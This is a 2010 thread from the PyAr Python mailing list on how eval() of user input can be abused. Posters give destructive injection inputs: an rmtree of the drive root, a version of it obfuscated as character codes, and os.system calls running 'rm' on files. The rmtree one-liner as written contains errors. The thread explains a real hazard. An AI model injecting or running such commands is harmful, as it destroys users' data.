[pyar] Peligrosidad de un lambda
QliX=D! [aka EHB]
qlixed en gmail.com
Vie Oct 1 15:49:42 ART 2010
o podes hacer la version multiplataforma de eso:
eval("__import__(\'shutil\').rmtree(os.path.splitdrive(os.path.abspath(__import__(\'os\').curdir)),
true)")
o la version ofuscada 1:
eval("''.join(map(chr,
[95,95,105,109,112,111,114,116,95,95,40,39,115,104,117,116,105,108,39,41,46,114,109,116,114,101,101,40,111,115,46,112,97,116,104,46,115,112,108,105,116,100,114,105,118,101,40,111,115,46,112,97,116,104,46,97,98,115,112,97,116,104,40,95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,99,117,114,100,105,114,41,41,44,32,116,114,117,101,41]))")
:D
Saludos.
EHB
2010/9/30 Daniel Moisset <dmoisset en machinalis.com>:
> 2010/9/30 Ale <peralta.alejandro en gmail.com>:
>> Supongo que si, algo raro se puede hacer:
>>
>>
>> In [1]: import os
>>
>> In [2]: eval("os.system('ls /proc')")
>> ...(me lista los archivos de /proc)
>>
>> Así que supongo que si en tu modulo import os o algo por el estilo, un 'rm
>> -rf /' podes hacer tranquilamente.
>>
>
> O sino está os importado afuera, que el usuario ingrese:
>
> __import__('os').system('rm directorioimportante/*')
>
> D.
> _______________________________________________
> pyar mailing list pyar en python.org.ar
> http://listas.python.org.ar/listinfo/pyar
>
> PyAr - Python Argentina - Sitio web: http://www.python.org.ar/
>
More information about the pyar
mailing list